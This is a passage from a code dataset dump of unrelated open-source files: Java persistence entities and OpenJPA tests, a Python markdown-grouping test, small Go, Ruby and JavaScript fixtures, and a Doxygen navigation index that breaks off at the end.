repo_name
stringlengths 6
101
| path
stringlengths 4
300
| text
stringlengths 7
1.31M
|
|---|---|---|
Pandrex247/patched-src-eclipselink
|
utils/org.eclipse.persistence.dbws.builder/src/org/eclipse/persistence/tools/dbws/PLSQLProcedureOperationModel.java
|
<filename>utils/org.eclipse.persistence.dbws.builder/src/org/eclipse/persistence/tools/dbws/PLSQLProcedureOperationModel.java
package org.eclipse.persistence.tools.dbws;
public class PLSQLProcedureOperationModel extends ProcedureOperationModel {
@Override
public boolean isPLSQLProcedureOperation() {
return true;
}
}
|
wbars/go-lang-idea-plugin
|
testData/psi/resolve/vars/SimpleMethodParameter.go
|
package main
func method(/*def*/x int) {
/*ref*/x
}
|
a-pompom/Python-markdownParser
|
tests/converter/converter_grouping_test.py
|
<gh_stars>0
import pytest
from app.converter.converter import group_same_range_blocks
from app.markdown.parser import MarkdownParser
class TestGrouping:
""" 同範囲を同一とみなすBlock要素をグルーピングできるか"""
# CodeBlockの範囲内では当該メソッドによりCodeBlockへグループ化されるか
@pytest.mark.parametrize(
('lines', 'expected_list'),
[
(
['```JavaScript', 'const i = 0;', '```', 'plain text'],
['[CodeBlock: language=JavaScript | Child of CodeBlock -> Plain: text=]',
'[CodeChildBlock: | Child of CodeChildBlock -> Plain: text=const i = 0;]',
'[Paragraph: indent_depth=0 | Child of Paragraph -> Plain: text=plain text]']
),
(
['# heading', '```', 'sort();', '```'],
['[Heading: size=1 | Child of Heading -> Plain: text=heading]',
'[CodeBlock: language= | Child of CodeBlock -> Plain: text=]',
'[CodeChildBlock: | Child of CodeChildBlock -> Plain: text=sort();]']
),
(
['本文', '```python', 'for (int i=0; i < 10; i++)', '```'],
['[Paragraph: indent_depth=0 | Child of Paragraph -> Plain: text=本文]',
'[CodeBlock: language=python | Child of CodeBlock -> Plain: text=]',
'[CodeChildBlock: | Child of CodeChildBlock -> Plain: text=for (int i=0; i < 10; i++)]']
),
(
['コードの例を示します。', '```', '> 入れ忘れました'],
['[Paragraph: indent_depth=0 | Child of Paragraph -> Plain: text=コードの例を示します。]',
'[CodeBlock: language= | Child of CodeBlock -> Plain: text=]',
'[CodeChildBlock: | Child of CodeChildBlock -> Plain: text=> 入れ忘れました]']
),
],
ids=['head', 'between', 'tail', 'no end']
)
def test_code_block(self, lines: list[str], expected_list: list[str]):
# GIVEN
sut = group_same_range_blocks
blocks = MarkdownParser().parse(lines).content
# WHEN
actual_blocks = sut(blocks)
# THEN
for actual, expected in zip(actual_blocks, expected_list):
assert repr(actual) == expected
# グループ化対象外のものはそのまま出力されるか
@pytest.mark.parametrize(
('lines', 'expected_list'),
[
(
['plain text', '# heading'],
['[Paragraph: indent_depth=0 | Child of Paragraph -> Plain: text=plain text]',
'[Heading: size=1 | Child of Heading -> Plain: text=heading]']
)
]
)
def test_not_grouping(self, lines: list[str], expected_list: list[str]):
# GIVEN
sut = group_same_range_blocks
blocks = MarkdownParser().parse(lines).content
# WHEN
actual_blocks = sut(blocks)
# THEN
for actual, expected in zip(actual_blocks, expected_list):
assert repr(actual) == expected
|
investtools/ftpmvc
|
lib/ftpmvc/authenticator/promiscuous.rb
|
module FTPMVC
module Authenticator
class Promiscuous
def authenticate(username, password)
true
end
end
end
end
|
codeperfector/joss
|
src/main/java/org/javaswift/joss/exception/CommandExceptionError.java
|
package org.javaswift.joss.exception;
public enum CommandExceptionError {
UNKNOWN,
ACCESS_FORBIDDEN,
ENTITY_ALREADY_EXISTS,
ENTITY_DOES_NOT_EXIST,
CONTAINER_NOT_EMPTY,
CONTENT_NOT_MODIFIED,
CONTENT_DIFFERENT,
MD5_CHECKSUM,
MISSING_CONTENT_LENGTH_OR_TYPE,
NO_SERVICE_CATALOG_FOUND,
NO_TENANT_SUPPLIED,
NO_END_POINT_FOUND,
UNAUTHORIZED
}
|
piekaa/lol-stats
|
src/main/java/pl/noip/lolstats/lol/stats/dto/stats/MatchesResponse.java
|
package pl.noip.lolstats.lol.stats.dto.stats;
import lombok.AllArgsConstructor;
import lombok.Getter;
import lombok.NoArgsConstructor;
import java.util.List;
@Getter
@NoArgsConstructor
@AllArgsConstructor
public class MatchesResponse {
private List<Match> matches;
}
|
desmondbera/dental-schedule-app
|
dentalScheduleApp/src/com/dentalScheduleApp/entities/DentalOffice.java
|
package com.dentalScheduleApp.entities;
import javax.persistence.CascadeType;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.Id;
import javax.persistence.NamedQueries;
import javax.persistence.NamedQuery;
import javax.persistence.OneToOne;
import javax.persistence.Table;
@Entity
@Table(name="dental_office")
@NamedQueries({
@NamedQuery(name="getAllDentalOffices", query="SELECT d FROM DentalOffice d")
})
public class DentalOffice {
@Id
@GeneratedValue
@Column(name="id")
private Long id;
@Column(name="office_name")
private String officeName;
@Column(name="office_phone_number")
private String officePhoneNumber;
@Column(name="office_address")
private String officeAddress;
@OneToOne(mappedBy = "primaryDentalOffice", cascade = CascadeType.ALL)
private User user;
// @OneToMany(mappedBy="dentalOfficeHygienists")
// private List<Hygienist> allHygienstsAtOffice;
// @OneToMany(mappedBy="dentalOfficeUsers")
// private List<User> allUsersAtOffice;
// @OneToMany(mappedBy="dentalOfficeForAppt")
// private List<Appointment> listOfAppts;
//
//Constructors
public DentalOffice() {
super();
}
public DentalOffice(Long id, String officeName, String officePhoneNumber, String officeAddress, User user) {
super();
this.id = id;
this.officeName = officeName;
this.officePhoneNumber = officePhoneNumber;
this.officeAddress = officeAddress;
this.user = user;
// this.allHygienstsAtOffice = allHygienstsAtOffice;
// this.listOfAppts = listOfAppts;
}
//Getters and Setters
public String getOfficeName() {
return officeName;
}
public void setOfficeName(String officeName) {
this.officeName = officeName;
}
public String getOfficePhoneNumber() {
return officePhoneNumber;
}
public void setOfficePhoneNumber(String officePhoneNumber) {
this.officePhoneNumber = officePhoneNumber;
}
public String getOfficeAddress() {
return officeAddress;
}
public void setOfficeAddress(String officeAddress) {
this.officeAddress = officeAddress;
}
public Long getId() {
return id;
}
public void setId(Long id) {
this.id = id;
}
public User getUser() {
return user;
}
public void setUser(User user) {
this.user = user;
}
// public List<Hygienist> getAllHygienstsAtOffice() {
// return allHygienstsAtOffice;
// }
//
// public void setAllHygienstsAtOffice(List<Hygienist> allHygienstsAtOffice) {
// this.allHygienstsAtOffice = allHygienstsAtOffice;
// }
}
|
solomax/openjpa
|
openjpa-persistence-jdbc/src/test/java/org/apache/openjpa/persistence/enhance/TestSubclassedBehavior.java
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.openjpa.persistence.enhance;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import javax.persistence.EntityManager;
import javax.persistence.EntityManagerFactory;
import org.apache.openjpa.persistence.enhance.common.apps.
BackingFieldNameMismatchInstance;
import org.apache.openjpa.persistence.enhance.common.apps.BaseEntity;
import org.apache.openjpa.persistence.enhance.common.apps.BasicSubclassInstance;
import org.apache.openjpa.persistence.enhance.common.apps.DerivedEntity;
import org.apache.openjpa.persistence.enhance.common.apps.Entity1;
import org.apache.openjpa.persistence.enhance.common.apps.
ManagedInverseTestInstance;
import org.apache.openjpa.persistence.enhance.common.apps.
ManagedInverseTestInstance2;
import org.apache.openjpa.persistence.enhance.common.apps.SubclassTestInstance;
import org.apache.openjpa.persistence.common.utils.AbstractTestCase;
import junit.framework.AssertionFailedError;
import org.apache.openjpa.kernel.Broker;
import org.apache.openjpa.kernel.OpenJPAStateManager;
import org.apache.openjpa.meta.AccessCode;
import org.apache.openjpa.meta.ClassMetaData;
import org.apache.openjpa.meta.FieldMetaData;
import org.apache.openjpa.persistence.JPAFacadeHelper;
import org.apache.openjpa.persistence.OpenJPAEntityManager;
import org.apache.openjpa.persistence.OpenJPAQuery;
import org.apache.openjpa.util.ExceptionInfo;
import org.apache.openjpa.util.ImplHelper;
public class TestSubclassedBehavior extends AbstractTestCase {
public TestSubclassedBehavior(String name) {
super(name, "enhancecactusapp");
}
public void setUp() {
deleteAll(BasicSubclassInstance.class);
deleteAll(BackingFieldNameMismatchInstance.class);
deleteAll(BaseEntity.class);
deleteAll(ManagedInverseTestInstance.class);
deleteAll(ManagedInverseTestInstance2.class);
}
public void testInheritance() {
OpenJPAEntityManager pm =
(OpenJPAEntityManager) currentEntityManager();
DerivedEntity de = (DerivedEntity) newInstance(pm, DerivedEntity.class);
BasicSubclassInstance basic = (BasicSubclassInstance) newInstance(pm,
BasicSubclassInstance.class);
basic.setStringField("basic one-to-one");
de.setOneToOne(basic);
Object oid = persistenceOperations(pm, de, false);
// ##### need a test case for JDOHelper.createEntityManager() for
// subclass
ClassMetaData meta = JPAFacadeHelper.getMetaData(pm, de.getClass());
assertEquals(BaseEntity.class, meta.getPCSuperclass());
pm = (OpenJPAEntityManager) currentEntityManager();
Object o = pm.find(DerivedEntity.class, oid);
assertTrue(o instanceof DerivedEntity);
de = (DerivedEntity) o;
Broker b = JPAFacadeHelper.toBroker(pm);
OpenJPAStateManager sm = b.getStateManager(de);
// we use getLoaded() here because isLoaded() always returns true.
assertFalse(sm.getLoaded().get(
sm.getMetaData().getField("oneToOne").getIndex()));
assertEquals("basic one-to-one", de.getOneToOne().getStringField());
assertTrue(sm.getLoaded().get(sm.getMetaData()
.getField("oneToOne").getIndex()));
startTx(pm);
pm.remove(de);
endTx(pm);
endEm(pm);
}
public void testBasicSubclassPersistenceOperations()
throws ClassNotFoundException {
OpenJPAEntityManager pm =
(OpenJPAEntityManager) currentEntityManager();
BasicSubclassInstance o = (BasicSubclassInstance) newInstance(pm,
BasicSubclassInstance.class);
persistenceOperations(pm, o, true);
}
public void testBackingFieldNameMismatch() {
OpenJPAEntityManager pm =
(OpenJPAEntityManager) currentEntityManager();
BackingFieldNameMismatchInstance o = (BackingFieldNameMismatchInstance)
newInstance(pm, BackingFieldNameMismatchInstance.class);
persistenceOperations(pm, o, true);
}
private Object newInstance(OpenJPAEntityManager pm, Class cls) {
return pm.createInstance(cls);
}
private Object createInstance(EntityManager em, Class cls) {
return ((OpenJPAEntityManager) em).createInstance(cls);
}
private Object persistenceOperations(OpenJPAEntityManager pm,
SubclassTestInstance o, boolean delete) {
startTx(pm);
pm.persist(o);
o.setStringField("new persistent instance");
endTx(pm);
Object oid = pm.getObjectId(o);
endEm(pm);
pm = (OpenJPAEntityManager) currentEntityManager();
o = (SubclassTestInstance) pm.find(SubclassTestInstance.class, oid);
assertEquals("new persistent instance", o.getStringField());
startTx(pm);
o.setStringField("modified persistent instance");
endTx(pm);
endEm(pm);
if (delete) {
pm = (OpenJPAEntityManager) currentEntityManager();
o = (SubclassTestInstance) pm.find(SubclassTestInstance.class, oid);
assertEquals("modified persistent instance", o.getStringField());
startTx(pm);
pm.remove(o);
endTx(pm);
endEm(pm);
return null;
} else {
return oid;
}
}
public void testPolymorphicQueries() {
deleteAll(BaseEntity.class);
deleteAll(BasicSubclassInstance.class);
OpenJPAEntityManager pm =
(OpenJPAEntityManager) currentEntityManager();
startTx(pm);
BaseEntity be = (BaseEntity) newInstance(pm, BaseEntity.class);
be.setShortField((short) 0);
pm.persist(be);
be = (BaseEntity) newInstance(pm, BaseEntity.class);
be.setShortField((short) 1);
pm.persist(be);
DerivedEntity de = (DerivedEntity) newInstance(pm, DerivedEntity.class);
de.setShortField((short) 2);
de.setOneToOne((BasicSubclassInstance) newInstance(pm,
BasicSubclassInstance.class));
pm.persist(de);
de = (DerivedEntity) newInstance(pm, DerivedEntity.class);
de.setShortField((short) 3);
de.setOneToOne((BasicSubclassInstance) newInstance(pm,
BasicSubclassInstance.class));
pm.persist(de);
endTx(pm);
endEm(pm);
pm = (OpenJPAEntityManager) currentEntityManager();
OpenJPAQuery q =
pm.createQuery("SELECT a FROM BaseEntity a "
+ "ORDER BY a.shortField ASC");
List l = (List) q.getResultList();
assertEquals(4, l.size());
assertEquals(0, ((BaseEntity) l.get(0)).getShortField());
assertEquals(1, ((BaseEntity) l.get(1)).getShortField());
assertEquals(2, ((BaseEntity) l.get(2)).getShortField());
assertEquals(3, ((BaseEntity) l.get(3)).getShortField());
assertTrue(l.get(2) instanceof DerivedEntity);
assertTrue(l.get(3) instanceof DerivedEntity);
endEm(pm);
}
public void testEnhancedClassChangesOutsideTxWithoutNTW() {
OpenJPAEntityManager pm =
(OpenJPAEntityManager) currentEntityManager();
startTx(pm);
deleteAll(Entity1.class);
endTx(pm);
Entity1 o = new Entity1(8, "pk 8", 4);
startTx(pm);
pm.persist(o);
endTx(pm);
Object oid = pm.getObjectId(o);
endEm(pm);
pm = (OpenJPAEntityManager) currentEntityManager();
o = (Entity1) pm.find(Entity1.class, oid);
try {
o.setStringField("hello");
fail("non-transactional write should not be allowed");
} catch (Exception e) {
// expected
} finally {
endEm(pm);
}
}
public void testSubclassChangesOutsideTxWithoutNTW() {
OpenJPAEntityManager pm =
(OpenJPAEntityManager) currentEntityManager();
BasicSubclassInstance basic = (BasicSubclassInstance) newInstance(pm,
BasicSubclassInstance.class);
basic.setStringField("foo");
startTx(pm);
pm.persist(basic);
endTx(pm);
Object oid = pm.getObjectId(basic);
endEm(pm);
pm = (OpenJPAEntityManager) currentEntityManager();
basic =
(BasicSubclassInstance) pm.find(BasicSubclassInstance.class, oid);
try {
basic.setStringField("hello");
fail("non-transactional write should not be allowed");
} catch (Exception e) {
// expected
} finally {
endEm(pm);
}
}
public void testBasicPMUses() {
// retain so we don't reload in the reads after the tx commit
OpenJPAEntityManager pm =
(OpenJPAEntityManager) currentEntityManager();
Broker broker = JPAFacadeHelper.toBroker(pm);
startTx(pm);
// register a new instance with the PM
BasicSubclassInstance basic = (BasicSubclassInstance) newInstance
(pm, BasicSubclassInstance.class);
assertTrue(ImplHelper.isManageable(basic));
basic.setStringField("foo");
pm.persist(basic);
assertTrue(broker.isNew(basic));
assertTrue(broker.isPersistent(basic));
// commit. this should cause the data to be written.
// ### should check SQL count
endTx(pm);
assertFalse(broker.isNew(basic));
OpenJPAStateManager sm = broker.getStateManager(basic);
assertNotNull(sm);
assertEquals(sm.getManagedInstance(), basic);
FieldMetaData fmd = sm.getMetaData().getField("stringField");
assertEquals("foo", sm.fetch(fmd.getIndex()));
assertTrue(sm.getLoaded().get(fmd.getIndex()));
pm.evict(basic);
assertFalse(sm.getLoaded().get(fmd.getIndex()));
// lazy loading
assertNotNull(basic.getStringField());
assertEquals("foo", sm.fetch(fmd.getIndex()));
assertEquals("foo", basic.getStringField());
assertTrue(sm.getLoaded().get(fmd.getIndex()));
startTx(pm);
basic.setStringField("bar");
assertTrue(broker.isDirty(basic));
endTx(pm);
Object oid = broker.getObjectId(basic);
assertNotNull(oid);
endEm(pm);
pm = (OpenJPAEntityManager) currentEntityManager();
basic =
(BasicSubclassInstance) pm.find(BasicSubclassInstance.class, oid);
assertEquals("bar", basic.getStringField());
startTx(pm);
pm.remove(basic);
assertTrue(JPAFacadeHelper.toBroker(pm).isDeleted(basic));
endTx(pm);
endEm(pm);
}
public void testGetObjectId() {
OpenJPAEntityManager pm =
(OpenJPAEntityManager) currentEntityManager();
BasicSubclassInstance basic = new BasicSubclassInstance();
basic.setStringField("foo");
startTx(pm);
pm.persist(basic);
endTx(pm);
Object oid = null;
try {
assertNotNull(oid = pm.getObjectId(basic));
} catch (Exception e) {
fail("object id lookup failed: " + e.getMessage());
}
startTx(pm);
pm.remove(basic);
// before committing, id should exist still
assertNotNull(pm.getObjectId(basic));
endTx(pm);
assertNull(pm.getObjectId(basic));
endEm(pm);
// looking up the instance by id in a new PM should fail.
pm = (OpenJPAEntityManager) currentEntityManager();
try {
pm.find(BasicSubclassInstance.class, oid);
fail("instance should have been deleted!");
} catch (Exception e) {
// expected
}
endEm(pm);
}
public void testChangesOutsideTxWithNTW() {
OpenJPAEntityManager pm =
(OpenJPAEntityManager) currentEntityManager();
BasicSubclassInstance basic = new BasicSubclassInstance();
basic.setStringField("foo");
startTx(pm);
pm.persist(basic);
endTx(pm);
Object oid = pm.getObjectId(basic);
endEm(pm);
pm = getNTWPM();
basic =
(BasicSubclassInstance) pm.find(BasicSubclassInstance.class, oid);
basic.setStringField("hello");
startTx(pm);
endTx(pm);
endEm(pm);
pm = (OpenJPAEntityManager) currentEntityManager();
basic =
(BasicSubclassInstance) pm.find(BasicSubclassInstance.class, oid);
try {
assertEquals("hello", basic.getStringField());
} catch (AssertionFailedError afe) {
bug(1205, afe, "JDO 2-style NTW not supported.");
}
}
public void testChangesOutsideTxWithoutNTW() {
OpenJPAEntityManager pm =
(OpenJPAEntityManager) currentEntityManager();
BasicSubclassInstance basic = new BasicSubclassInstance();
basic.setStringField("foo");
startTx(pm);
pm.persist(basic);
endTx(pm);
try {
basic.setStringField("hello");
fail("should not be able to write outside tx without NTW");
} catch (RuntimeException re) {
// expected case
Object failed = ((ExceptionInfo) re).getFailedObject();
assertNotNull(failed);
assertSame(basic, failed);
} finally {
endEm(pm);
}
}
private OpenJPAEntityManager getNTWPM() {
EntityManagerFactory pmf = getEmf();
OpenJPAEntityManager em =
(OpenJPAEntityManager) pmf.createEntityManager();
em.setNontransactionalWrite(true);
return em;
}
/*
public void testCallbacks ()
{
fail ("##### unimplemented test");
}
public void testTransactionListeners ()
{
fail ("#####");
}
public void testRemoteCommitListeners ()
{
fail ("#####");
}
public void testCaching ()
{
fail ("#####");
}
public void testRemote ()
{
fail ("#####");
}
*/
public void testVersionIncrementAndIdField() {
// make sure that version increments happen correctly, and are
// visible in the user-visible instance.
OpenJPAEntityManager pm =
(OpenJPAEntityManager) currentEntityManager();
BasicSubclassInstance basic = new BasicSubclassInstance();
basic.setStringField("foo");
startTx(pm);
pm.persist(basic);
endTx(pm);
assertEquals(1, basic.getVersion());
long id = basic.getId();
assertNotEquals(0, id);
startTx(pm);
basic.setStringField("bar");
endTx(pm);
assertEquals(2, basic.getVersion());
endEm(pm);
}
/*
public void testAutoAssignedFields ()
{
// make sure that auto-assigned field values get into the user-visible
// instance.
fail ("#####");
}
*/
public void testJPABasics() {
EntityManager em = currentEntityManager();
BasicSubclassInstance basic = (BasicSubclassInstance) createInstance(
em, BasicSubclassInstance.class);
basic.setStringField("hello");
startTx(em);
em.persist(basic);
endTx(em);
endEm(em);
}
/*
public void testDetachmentAndAttachemnt ()
{
fail ("#####");
}
public void testEmbeddedNonEnhanced ()
{
fail ("#####");
}
public void testTransactionalNonEnhanced ()
{
fail ("#####");
}
public void testBulkTransactionalNonEnhanced ()
{
fail ("#####");
}
*/
public void testSingleValuedInverseManagement() {
Map map = new HashMap();
map.put("openjpa.InverseManager", "true");
OpenJPAEntityManager pm = (OpenJPAEntityManager)
getEmf(map).createEntityManager();
ManagedInverseTestInstance managed = (ManagedInverseTestInstance)
newInstance(pm, ManagedInverseTestInstance.class);
ManagedInverseTestInstance2 managed2 = (ManagedInverseTestInstance2)
newInstance(pm, ManagedInverseTestInstance2.class);
managed.setStringField("managed");
managed2.setStringField("managed2");
managed.setManaged2(managed2);
startTx(pm);
pm.persist(managed);
endTx(pm);
assertSame(managed, managed2.getManaged());
}
public void testBackingFieldConfigurationWithTwoFactories() {
OpenJPAEntityManager pm =
(OpenJPAEntityManager) currentEntityManager();
// this causes DerivedEntity.class to get loaded into PCRegistry
newInstance(pm, DerivedEntity.class);
Map map = new HashMap();
map.put("openjpa.Log", "DiagnosticContext=subclass-two-factories-test");
pm = (OpenJPAEntityManager) getEmf(map).createEntityManager();
newInstance(pm, DerivedEntity.class);
// this second new-instance creation will result in the metadata
// defaults being loaded from the PCRegistry instead of via reflection.
// Make sure that things still work as expected from the
// registry-parsing code.
ClassMetaData meta = getConfiguration()
.getMetaDataRepositoryInstance().
getMetaData(DerivedEntity.class, null, false);
assertTrue("meta's access should be ACCESS_PROPERTY",
AccessCode.isProperty(meta.getAccessType()));
FieldMetaData[] fmds = meta.getFields();
for (int i = 0; i < fmds.length; i++) {
assertEquals(Method.class, fmds[i].getBackingMember().getClass());
// make sure that the fields are defined in the right part of the
// hierarchy
if (fmds[i].getName().equals("intField") ||
fmds[i].getName().equals("oneToOne")) {
assertEquals(DerivedEntity.class,
fmds[i].getDefiningMetaData().getDescribedType());
} else {
assertEquals(BaseEntity.class,
fmds[i].getDefiningMetaData().getDescribedType());
}
}
}
}
|
matias-capeletto/plugins
|
packages/node-resolve/test/fixtures/hash-in-path.js
|
import test from 'test/#/foo';
export default test;
|
purusharths/NumCpp
|
docs/doxygen/html/navtreeindex6.js
|
var NAVTREEINDEX6 =
{
"corrcoef_8hpp.html":[6,0,101],
"corrcoef_8hpp.html#a2232014b014afca61e5ebe93c5ba2c0c":[6,0,101,0],
"corrcoef_8hpp_source.html":[6,0,101],
"cos_8hpp.html":[6,0,102],
"cos_8hpp.html#a736de91eb8f79bfaf4dc92d7161f1c87":[6,0,102,1],
"cos_8hpp.html#af208ae28fe0df17392ca128188cbcd73":[6,0,102,0],
"cos_8hpp_source.html":[6,0,102],
"cosh_8hpp.html":[6,0,103],
"cosh_8hpp.html#a520e0290bb667b43a9f494b3858b5f17":[6,0,103,0],
"cosh_8hpp.html#abb07133a1f54b24a4a4986eefb5eda85":[6,0,103,1],
"cosh_8hpp_source.html":[6,0,103],
"count__nonzero_8hpp.html":[6,0,104],
"count__nonzero_8hpp.html#aebb0dfe3637c07f6a9f6e4f08cacf515":[6,0,104,0],
"count__nonzero_8hpp_source.html":[6,0,104],
"cov_8hpp.html":[6,0,105],
"cov_8hpp.html#a61dbb6e2f778525a305dc235a9a43c76":[6,0,105,0],
"cov_8hpp_source.html":[6,0,105],
"cov__inv_8hpp.html":[6,0,106],
"cov__inv_8hpp.html#a2a45ff9db0b44932844a5d9cb13b2d38":[6,0,106,0],
"cov__inv_8hpp_source.html":[6,0,106],
"cross_8hpp.html":[6,0,107],
"cross_8hpp.html#a4d1ed581965ed53090824290def38565":[6,0,107,0],
"cross_8hpp_source.html":[6,0,107],
"cumprod_8hpp.html":[6,0,110],
"cumprod_8hpp.html#aafc4846f2f7956841d356060c9689cba":[6,0,110,0],
"cumprod_8hpp_source.html":[6,0,110],
"cumsum_8hpp.html":[6,0,111],
"cumsum_8hpp.html#a2abc8c4a18823234e3baec64d10c0dcd":[6,0,111,0],
"cumsum_8hpp_source.html":[6,0,111],
"cyclic__hankel__1_8hpp.html":[6,0,112],
"cyclic__hankel__1_8hpp.html#ae7053cd6eafb59a62ba6ede63aac6f90":[6,0,112,0],
"cyclic__hankel__1_8hpp.html#af5dd42de33ec77dda47dd089561895d5":[6,0,112,1],
"cyclic__hankel__1_8hpp_source.html":[6,0,112],
"cyclic__hankel__2_8hpp.html":[6,0,113],
"cyclic__hankel__2_8hpp.html#a388472a49e89f21b3eb144368fe55664":[6,0,113,1],
"cyclic__hankel__2_8hpp.html#a8e3b27238d1cae20e4ee071766549c5d":[6,0,113,0],
"cyclic__hankel__2_8hpp_source.html":[6,0,113],
"deg2rad_8hpp.html":[6,0,117],
"deg2rad_8hpp.html#a2cdc1c791ab98eb708ba5662ffb82b39":[6,0,117,1],
"deg2rad_8hpp.html#a828388cb973b4e28e0b7060694e2604a":[6,0,117,0],
"deg2rad_8hpp_source.html":[6,0,117],
"degree_seperation_8hpp.html":[6,0,119],
"degree_seperation_8hpp.html#a06135e21507cfe2aa1cb4154fe1702bf":[6,0,119,0],
"degree_seperation_8hpp.html#abc47b2d64d107bcb19ff696ecff89edf":[6,0,119,1],
"degree_seperation_8hpp_source.html":[6,0,119],
"degrees_8hpp.html":[6,0,118],
"degrees_8hpp.html#a75c2b6b4713a5695a4738da25cf9d262":[6,0,118,1],
"degrees_8hpp.html#aab0d24a5ffaf73330854bbcfc47d2fee":[6,0,118,0],
"degrees_8hpp_source.html":[6,0,118],
"delete_indices_8hpp.html":[6,0,121],
"delete_indices_8hpp.html#a53ddac04b49358cb41736640871bcea2":[6,0,121,2],
"delete_indices_8hpp.html#a7c33539e037218ba9b0b11acfae38363":[6,0,121,1],
"delete_indices_8hpp.html#ae59479b36cd7991d9dfc2d836b4d838c":[6,0,121,0],
"delete_indices_8hpp_source.html":[6,0,121],
"det_8hpp.html":[6,0,122],
"det_8hpp.html#a55bafcebbc897458164e8dc511b6119c":[6,0,122,0],
"det_8hpp_source.html":[6,0,122],
"diag_8hpp.html":[6,0,123],
"diag_8hpp.html#a8c80cee3e4853bc79290c995cf9d69dc":[6,0,123,0],
"diag_8hpp_source.html":[6,0,123],
"diagflat_8hpp.html":[6,0,124],
"diagflat_8hpp.html#af3ab63d17fa40b3c3880a9065a95e47f":[6,0,124,0],
"diagflat_8hpp_source.html":[6,0,124],
"diagonal_8hpp.html":[6,0,125],
"diagonal_8hpp.html#a8eeb67e5ad2a5b0567570a774b7fb1f3":[6,0,125,0],
"diagonal_8hpp_source.html":[6,0,125],
"diff_8hpp.html":[6,0,126],
"diff_8hpp.html#a94701ce8e9c8a4bb6dd162da5d07eadd":[6,0,126,0],
"diff_8hpp_source.html":[6,0,126],
"digamma_8hpp.html":[6,0,127],
"digamma_8hpp.html#a6419633142287d898c551f99cd7c589d":[6,0,127,0],
"digamma_8hpp.html#a78dead2375df379d1976ff87f62fbade":[6,0,127,1],
"digamma_8hpp_source.html":[6,0,127],
"discrete_8hpp.html":[6,0,128],
"discrete_8hpp.html#a2ea5db9ee73d9f7a633e5899e4be2c94":[6,0,128,0],
"discrete_8hpp.html#ae5367b53538e888028853607e1c522a4":[6,0,128,1],
"discrete_8hpp_source.html":[6,0,128],
"divide_8hpp.html":[6,0,129],
"divide_8hpp.html#a130f8bc6ccdb70da4cfb245659bc61af":[6,0,129,4],
"divide_8hpp.html#a2389581759aa0446030642193638ef63":[6,0,129,0],
"divide_8hpp.html#a48c5c456736ced98b946e89b573c204e":[6,0,129,2],
"divide_8hpp.html#a7d83e88182dd99da3ad09e76bb916a35":[6,0,129,6],
"divide_8hpp.html#a85d01a50833bff37f13437cdd3e1a1a0":[6,0,129,1],
"divide_8hpp.html#a9b10ead8c068b9b473023c993dc25d7c":[6,0,129,8],
"divide_8hpp.html#aad734f111f1fc140c2c3c8fc84f398b5":[6,0,129,7],
"divide_8hpp.html#ade8f0271af8c94c0a0e1166aba83a619":[6,0,129,5],
"divide_8hpp.html#aed2d517035fdd5539971fa0c1dcb61df":[6,0,129,3],
"divide_8hpp_source.html":[6,0,129],
"dot_8hpp.html":[6,0,130],
"dot_8hpp.html#a2c9414f356ae2025a7cde3a192d6d67d":[6,0,130,0],
"dot_8hpp.html#a6ab78d4355c57b053b6e44f710d60528":[6,0,130,2],
"dot_8hpp.html#abfdbde62bdc084a9b8f9a894fa173c40":[6,0,130,1],
"dot_8hpp_source.html":[6,0,130],
"dump_8hpp.html":[6,0,132],
"dump_8hpp.html#af6e71bd96dbc78f9ca018d2da0a7e653":[6,0,132,0],
"dump_8hpp_source.html":[6,0,132],
"ellint__1_8hpp.html":[6,0,133],
"ellint__1_8hpp.html#a0198bebbecba53e96b36d270be457490":[6,0,133,0],
"ellint__1_8hpp.html#aa7fd769db69bde9583f039306c011816":[6,0,133,1],
"ellint__1_8hpp_source.html":[6,0,133],
"ellint__2_8hpp.html":[6,0,134],
"ellint__2_8hpp.html#a920986b87a9c40529343491bebdadfe0":[6,0,134,0],
"ellint__2_8hpp.html#ab9c4568493afa63db21d5b88f3c2a82d":[6,0,134,1],
"ellint__2_8hpp_source.html":[6,0,134],
"ellint__3_8hpp.html":[6,0,135],
"ellint__3_8hpp.html#aaf7e9aa3cce2502f67735c787588a2eb":[6,0,135,1],
"ellint__3_8hpp.html#ab04eafe87336f4206d63b804dc8653ca":[6,0,135,0],
"ellint__3_8hpp_source.html":[6,0,135],
"empty_8hpp.html":[6,0,136],
"empty_8hpp.html#a3da6e6c01236f9c2af8591a890f7d717":[6,0,136,1],
"empty_8hpp.html#a47dcd15b30a7fd2b977377ebb37cbdb6":[6,0,136,0],
"empty_8hpp_source.html":[6,0,136],
"empty__like_8hpp.html":[6,0,137],
"empty__like_8hpp.html#ad03bf017e6cc91a4169134de885bb9ad":[6,0,137,0],
"empty__like_8hpp_source.html":[6,0,137],
"endianess_8hpp.html":[6,0,139],
"endianess_8hpp.html#a6d1bce5e0cf3f24f84a50b945eec7a26":[6,0,139,0],
"endianess_8hpp_source.html":[6,0,139],
"equal_8hpp.html":[6,0,140],
"equal_8hpp.html#a7440518ae70823ac15ea1711d8df7bfc":[6,0,140,0],
"equal_8hpp_source.html":[6,0,140],
"erf_8hpp.html":[6,0,141],
"erf_8hpp.html#a5b7ac05949538787c3fdec373cb05126":[6,0,141,0],
"erf_8hpp.html#a8b2da132f8a6d86ea0bcce34819d1833":[6,0,141,1],
"erf_8hpp_source.html":[6,0,141],
"erf__inv_8hpp.html":[6,0,142],
"erf__inv_8hpp.html#a0f66785ec1e2643dd4c932ff7cae61a4":[6,0,142,1],
"erf__inv_8hpp.html#abab69146b99ff384c6de4a24da69a780":[6,0,142,0],
"erf__inv_8hpp_source.html":[6,0,142],
"erfc_8hpp.html":[6,0,143],
"erfc_8hpp.html#a1673dca59c73c85eedf077fb62aab5d7":[6,0,143,1],
"erfc_8hpp.html#a8671b7ab0e06230889f4a0cf417a248f":[6,0,143,0],
"erfc_8hpp_source.html":[6,0,143],
"erfc__inv_8hpp.html":[6,0,144],
